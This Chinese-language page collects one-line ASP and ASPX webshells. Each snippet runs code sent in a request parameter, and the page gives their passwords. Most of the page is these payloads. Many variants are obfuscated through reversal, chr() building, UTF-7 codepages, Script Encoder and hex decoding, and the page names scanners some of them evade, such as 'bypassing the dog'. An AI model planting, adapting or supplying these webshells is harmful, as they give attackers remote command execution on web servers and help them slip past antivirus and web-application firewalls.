一句话木马：ASP篇

 

ASP一句话木马收集：

 

<%eval request("chopper")%>

<%execute request("chopper")%>

<%execute(request("chopper"))%>

<%ExecuteGlobal request("chopper")%>

<%Eval(Request(chr(35)))%>

<%dy=request("c")%><%Eval(dy)%> 

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 

<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>

<%execute request("c")%><%'<% loop <%:%>

< %'<% loop <%:%><%execute request("a")%>

<script language=vbs runat=server>eval(request("c"))</script> 

<script language=VBScript runat=server>execute request("#")</script> 

<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

 

Script Encoder 加密  //密码c

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>

 

这段代码将"eval request(/*/z/*/)"逆序成")/*/z/*/(tseuqer lave", 以逃避特征码查杀, 当脚本被访问, 其代码会被动态的解码还原成原始的一句话后门. 当前90%以上的未知后门和变形后门都是使用此类动态解码技术

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

 密码 z

 

可以躲过雷客图的一句话木马：

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>

 

<%
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>

<%
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>

 

简单的aspx免杀

<%@ Page Language="Jscript"%>
<%
var a = Request.Item["M"];
var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
eval(a,b);
Response.Write("Test");
%>

 

 

过狗一句话：

<%
dim play
'
'
''''''''''''''''''
'''''''''
play = request("#")
%>
Error
<%
execute(play)
%>

 

<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>

 

 

参考资料：

一些常见的webshell后门的特征码  https://zhuanlan.zhihu.com/p/22149072

有关一句话后门的收集与整理         http://book.51cto.com/art/201204/328741.htm

asp执行cmd实例                            http://m.blog.csdn.net/woswod/article/details/63253494